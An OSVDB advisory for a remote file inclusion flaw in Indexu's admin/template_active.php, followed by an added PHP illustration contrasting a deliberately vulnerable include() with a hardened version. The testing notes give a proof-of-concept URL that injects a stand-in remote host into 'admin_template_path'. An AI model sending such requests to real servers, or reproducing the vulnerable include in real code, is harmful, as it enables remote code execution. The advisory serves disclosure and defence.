Indexu admin/template_active.php admin_template_path Variable Remote File Inclusion

2006-06-16T00:00:00
ID OSVDB:39310
Type osvdb
Reporter OSVDB
Modified 2006-06-16T00:00:00

Description

Vulnerability Description

Indexu contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to admin/template_active.php not properly sanitizing user input supplied to the 'admin_template_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands, which will be executed by the vulnerable script.
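The pattern this advisory describes, as an added PHP illustration that is not Indexu's own code: a request parameter is used as the directory prefix of an include(), so when PHP is configured to allow URL includes the prefix can be a remote URL and the fetched content is executed as PHP. The two functions, the constant TEMPLATE_ROOT and the template layout are hypothetical; the parameter value is passed as an argument so the check can be exercised without a web server.

```php
<?php
// Added illustration, not Indexu's code. Shows the include() pattern that
// remote file inclusion advisories describe and a hardened replacement.
// TEMPLATE_ROOT and the "<root>/<name>/template_active.php" layout are assumed.

const TEMPLATE_ROOT = __DIR__ . '/templates';

// Vulnerable: the supplied value is trusted as a path (or URL) prefix.
function load_template_vulnerable(string $admin_template_path): void
{
    include $admin_template_path . '/template_active.php';
}

// Hardened: the value is reduced to a single path component, resolved under a
// fixed root, and rejected unless it stays inside that root.
function resolve_template_safely(string $admin_template_path): ?string
{
    // One path component only: no separators, no "..", no scheme prefix,
    // no NUL bytes, bounded length.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $admin_template_path)) {
        return null;
    }
    $candidate = realpath(TEMPLATE_ROOT . '/' . $admin_template_path . '/template_active.php');
    $root      = realpath(TEMPLATE_ROOT);
    // realpath() returns false for missing files; the prefix comparison also
    // rejects symlinks that resolve outside the template root.
    if ($candidate === false || $root === false
        || strpos($candidate, $root . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $candidate;
}

function load_template_hardened(string $admin_template_path): void
{
    $path = resolve_template_safely($admin_template_path);
    if ($path === null) {
        http_response_code(400);
        exit('invalid template');
    }
    include $path;
}

// Constructed sample inputs: the shape of the advisory's test value, a
// directory traversal attempt, and a plain template name. The last one is
// accepted only if templates/default/template_active.php actually exists.
foreach (['http://evilcode.txt?', '../../etc', 'default'] as $value) {
    printf("%-22s => %s\n", var_export($value, true),
        resolve_template_safely($value) === null ? 'rejected' : 'accepted');
}
```

The regular expression does the real work: a value that cannot contain `/`, `:` or `.` can be neither a URL nor a traversal, and the realpath() prefix check is a second, independent guard. As a configuration backstop, setting allow_url_include=Off (PHP 5.2 and later) and, where nothing needs it, allow_url_fopen=Off prevents include() from fetching remote content at all; on the detection side, request logs in which an include-path style parameter carries a value beginning with a URL scheme are a direct indicator of attempts against this class of flaw.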

Solution Description

Upgrade to version 5.1.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Manual Testing Notes

http://[target]/indexu/admin/template_active.php?admin_template_path=http://evilcode.txt?

References:

Vendor URL: http://www.nicecoder.com/
Security Tracker: 1016330
Secunia Advisory ID: 18752
Related OSVDB ID: 39355
Related OSVDB ID: 39351
Related OSVDB ID: 39353
Related OSVDB ID: 39346
Related OSVDB ID: 39347
Related OSVDB ID: 39350
Related OSVDB ID: 39345
Related OSVDB ID: 39344
Related OSVDB ID: 39341
Related OSVDB ID: 39336
Related OSVDB ID: 39332
Related OSVDB ID: 39323
Related OSVDB ID: 39315
Related OSVDB ID: 39311
Related OSVDB ID: 1018076
Related OSVDB ID: 1018077
Related OSVDB ID: 1018082
Related OSVDB ID: 1018084
Related OSVDB ID: 1018089
Related OSVDB ID: 1018090
Related OSVDB ID: 39342
Related OSVDB ID: 39339
Related OSVDB ID: 39338
Related OSVDB ID: 39337
Related OSVDB ID: 39331
Related OSVDB ID: 39330
Related OSVDB ID: 39324
Related OSVDB ID: 39326
Related OSVDB ID: 39313
Related OSVDB ID: 39314
Related OSVDB ID: 39317
Related OSVDB ID: 1018078
Related OSVDB ID: 39310
Related OSVDB ID: 1018086
Related OSVDB ID: 39352
Related OSVDB ID: 39354
Related OSVDB ID: 39349
Related OSVDB ID: 39340
Related OSVDB ID: 39334
Related OSVDB ID: 39333
Related OSVDB ID: 39327
Related OSVDB ID: 39328
Related OSVDB ID: 39318
Related OSVDB ID: 39319
Related OSVDB ID: 39316
Related OSVDB ID: 39312
Related OSVDB ID: 1018085
Related OSVDB ID: 1018087
Related OSVDB ID: 39348
Related OSVDB ID: 39343
Related OSVDB ID: 39335
Related OSVDB ID: 39329
Related OSVDB ID: 39325
Related OSVDB ID: 39320
Related OSVDB ID: 39321
Related OSVDB ID: 39322
Related OSVDB ID: 1018079
Related OSVDB ID: 1018083
Related OSVDB ID: 1018088
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-06/0318.html
ISS X-Force ID: 27262
CVE ID: CVE-2006-7017